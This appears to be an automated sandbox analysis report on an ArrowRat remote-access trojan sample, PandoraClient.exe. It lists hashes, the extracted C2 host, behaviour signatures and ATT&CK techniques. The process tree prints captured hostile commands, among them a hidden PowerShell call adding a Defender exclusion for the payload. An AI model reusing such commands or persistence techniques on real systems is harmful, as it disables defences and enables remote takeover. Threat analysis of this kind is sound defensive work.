Analysis

  • max time kernel
    111s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-03-2023 11:31

General

  • Target

    PandoraClient.exe

  • Size

    158KB

  • MD5

    3eee7fa59a133b6c2fef8f0ad620fbaa

  • SHA1

    4375f6e3df9e013dd69ba94917ae17de490bb279

  • SHA256

    57863c2370ced5e6f6979f44244d76c97e09574a8178ace79755287fc835ab91

  • SHA512

    ee30da5303191a0d4c0e08553e27df3e0c47e2310b898d4521065d11dd81bfd2507d731c1a58bab113092a35ccfa79ccd14831bac680983efbad63d40beb64fe

  • SSDEEP

    3072:hbzVL+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP7fO8Y:hbzVC0ODhTEPgnjuIJzo+PPcfP7W8

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

soon-lp.at.ply.gg:17209

Mutex

JwqqOowIr

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PandoraClient.exe
    "C:\Users\Admin\AppData\Local\Temp\PandoraClient.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:952
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client soon-lp.at.ply.gg 17209 JwqqOowIr
      2⤵
        PID:3580
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2308
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\mWZRywXOh\rlmxBSNVZ.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2104
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:536
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4108

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Winlogon Helper DLL

    1
    T1004

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Peripheral Device Discovery

    2
    T1120

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133242211350169577.txt
      Filesize

      75KB

      MD5

      e3417e64fd17fa01c90cf956829ca7ff

      SHA1

      f8960ede60ed71f3ca9f505556390518621393f6

      SHA256

      a55bc5d91308f7bb7cef9268f6333172653c4119c8641abcb0692116fecd860c

      SHA512

      3126805740cdea1d97c1887c0e0e33094b5e187d218f0b8b26c5305ed6aa1737d88a9434e3cfcec9bf1009c9a4fe53e441312e8c24171e08fad2eed0d08cf4a9

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fe03uodk.rpt.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/952-165-0x00000000036C0000-0x00000000036C1000-memory.dmp
      Filesize

      4KB

    • memory/2104-158-0x00000258E18E0000-0x00000258E18F0000-memory.dmp
      Filesize

      64KB

    • memory/2104-157-0x00000258E18E0000-0x00000258E18F0000-memory.dmp
      Filesize

      64KB

    • memory/2104-145-0x00000258E1820000-0x00000258E1842000-memory.dmp
      Filesize

      136KB

    • memory/2104-160-0x00000258E18E0000-0x00000258E18F0000-memory.dmp
      Filesize

      64KB

    • memory/2116-322-0x0000019AA4360000-0x0000019AA4370000-memory.dmp
      Filesize

      64KB

    • memory/2116-133-0x0000019AA25E0000-0x0000019AA260E000-memory.dmp
      Filesize

      184KB

    • memory/3580-154-0x0000000005DF0000-0x0000000005E40000-memory.dmp
      Filesize

      320KB

    • memory/3580-137-0x0000000004D80000-0x0000000004E1C000-memory.dmp
      Filesize

      624KB

    • memory/3580-159-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
      Filesize

      64KB

    • memory/3580-151-0x0000000005C30000-0x0000000005C96000-memory.dmp
      Filesize

      408KB

    • memory/3580-136-0x0000000004CE0000-0x0000000004D72000-memory.dmp
      Filesize

      584KB

    • memory/3580-134-0x0000000000400000-0x0000000000418000-memory.dmp
      Filesize

      96KB

    • memory/3580-321-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
      Filesize

      64KB

    • memory/3580-150-0x0000000005510000-0x0000000005AB4000-memory.dmp
      Filesize

      5.6MB

    • memory/4108-172-0x0000024430840000-0x0000024430860000-memory.dmp
      Filesize

      128KB

    • memory/4108-174-0x0000024430800000-0x0000024430820000-memory.dmp
      Filesize

      128KB

    • memory/4108-176-0x0000024430C00000-0x0000024430C20000-memory.dmp
      Filesize

      128KB